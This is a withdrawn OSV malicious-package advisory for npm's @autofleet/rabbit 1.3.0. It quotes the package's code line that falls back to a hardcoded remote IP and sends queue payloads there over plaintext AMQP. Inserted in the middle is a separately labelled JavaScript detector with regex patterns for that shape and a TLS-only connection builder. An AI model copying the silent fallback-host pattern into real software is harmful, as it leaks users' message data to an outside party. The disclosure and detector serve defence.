MAL-2026-4787

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@autofleet/rabbit/MAL-2026-4787.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4787
Withdrawn
2026-05-26T20:50:05Z
Published
2026-05-26T08:09:30Z
Modified
2026-05-27T00:32:00.998960936Z
Summary
Malicious code in @autofleet/rabbit (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c)

The package's compiled entry (dist/index.js:48) defines let host = process.env.RABBITMQ_SERVICE_HOST || '35.240.13.28' and then connects via amqp_connection_manager.connect(['amqp://' + host]). Any consumer that uses the advertised publish / sendToQueue / consume APIs without explicitly setting RABBITMQ_SERVICE_HOST will silently connect to 35.240.13.28 (a Google Compute Engine IP) over plaintext AMQP and ship the caller's queue/exchange payloads to that fixed remote host. The hardcoded fallback is not documented anywhere in the package metadata (the description is empty), so installers have no notice that omitting the env var causes their message traffic to leave their environment. The connection is made over amqp:// (port 5672, no TLS), so payloads also traverse the network in cleartext, compounding the leak. This is a silent-relay shape: normal use of the library's documented API moves caller-supplied data to a publisher-chosen destination.
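The pattern described above, as an added example that is not part of this advisory or of the @autofleet/rabbit package: a small static check that flags `process.env.NAME || '<remote host>'` fallbacks and plaintext `amqp://` URLs in a package's entry file, beside a fail-closed broker-URL builder that a consumer (or a corrected release) would use instead of the fallback. The sample source is constructed to mirror the shape the source text describes, not copied from the package; `buildBrokerUrl`, its `RABBITMQ_SERVICE_PORT` variable and its allow-list parameter are assumptions for this example, not the package's API.

```javascript
// Added example: a static check for the silent-relay shape described in the
// advisory (env-var fallback to a hardcoded remote host + plaintext amqp://),
// plus a fail-closed broker-URL builder. Not code from @autofleet/rabbit.

// Constructed sample mirroring the described shape of dist/index.js.
// It is NOT the package's actual source.
const SAMPLE_DIST_INDEX = `
const amqp_connection_manager = require('amqp-connection-manager');
let host = process.env.RABBITMQ_SERVICE_HOST || '35.240.13.28';
const connection = amqp_connection_manager.connect(['amqp://' + host]);
`;

// process.env.NAME || '<literal>'  (single, double or backtick quotes)
const ENV_FALLBACK_RE = /process\.env\.([A-Za-z0-9_]+)\s*\|\|\s*(['"`])([^'"`]+)\2/g;
// A quoted URL that starts with the non-TLS AMQP scheme (amqps:// does not match).
const PLAINTEXT_AMQP_RE = /['"`]amqp:\/\//;
const IPV4_RE = /^(?:\d{1,3}\.){3}\d{1,3}$/;

// A fallback to loopback is the usual benign development default; anything else
// that parses as an IPv4 address or a dotted hostname is treated as a remote host.
function looksLikeRemoteHost(literal) {
  if (literal === 'localhost' || literal === '::1' || literal.startsWith('127.')) return false;
  if (IPV4_RE.test(literal)) return true;
  return /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(literal);
}

// Scan JavaScript source text line by line; returns findings with 1-based line numbers.
function scanFallbackHosts(source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    for (const m of line.matchAll(ENV_FALLBACK_RE)) {
      const envVar = m[1];
      const literal = m[3];
      if (looksLikeRemoteHost(literal)) {
        findings.push({ line: idx + 1, kind: 'env-fallback-remote-host', envVar, literal });
      }
    }
    if (PLAINTEXT_AMQP_RE.test(line)) {
      findings.push({ line: idx + 1, kind: 'plaintext-amqp-url' });
    }
  });
  return findings;
}

// Hypothetical fail-closed replacement for the fallback: no env var means no
// connection, the host must be on an explicit allow-list, and the scheme is
// always amqps (TLS). RABBITMQ_SERVICE_PORT and allowedHosts are assumptions.
function buildBrokerUrl(env, allowedHosts) {
  const host = env.RABBITMQ_SERVICE_HOST;
  if (!host) {
    throw new Error('RABBITMQ_SERVICE_HOST is not set; refusing to fall back to a built-in host');
  }
  if (!allowedHosts.includes(host)) {
    throw new Error(`broker host ${host} is not on the allow-list`);
  }
  const port = env.RABBITMQ_SERVICE_PORT || '5671'; // 5671 is the standard AMQPS port
  return `amqps://${host}:${port}`;
}

// Stand-alone run: print what the scanner finds in the constructed sample.
console.log(scanFallbackHosts(SAMPLE_DIST_INDEX));
```

Run against an unpacked tarball the scanner is pointed at each file's text (for example the `dist/index.js` listed under evidence_files); a finding of kind env-fallback-remote-host next to a plaintext-amqp-url finding on adjacent lines is exactly the shape the source text reports.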

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c",
            "import_time": "2026-05-26T09:17:32.017497589Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-26T08:09:30Z",
            "versions": [
                "1.3.0"
            ],
            "id": "IN-MAL-2026-004868"
        }
    ]
}
References
Credits

Affected packages

npm / @autofleet/rabbit

Package

Name
@autofleet/rabbit
Purl
pkg:npm/%40autofleet%2Frabbit

Affected ranges

Affected versions

1.*
1.3.0

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "rabbit-1.3.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-QZvovIx6BfzUEarXCrno4IsuvcPV4BFPrs0jCgXnsJynR36d3ZHKpD/MLh80PBbQ0GD2EEPwmmc7ejrAnEy+Bw==",
                "sha1": "f9140b65fb6e2e28c7e85ff3af16ad58a6665cca"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "96f97ad9d859886d466d246c7b940cca3ded7e9125ffc7fd17a758464c53db6a",
            "tlsh": "46a1afa074bf2531456370a84a6f6101203cee17b405ce587abca9d0dfb6260e9e7ff5",
            "path": "dist/index.js"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@autofleet/rabbit/MAL-2026-4787.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]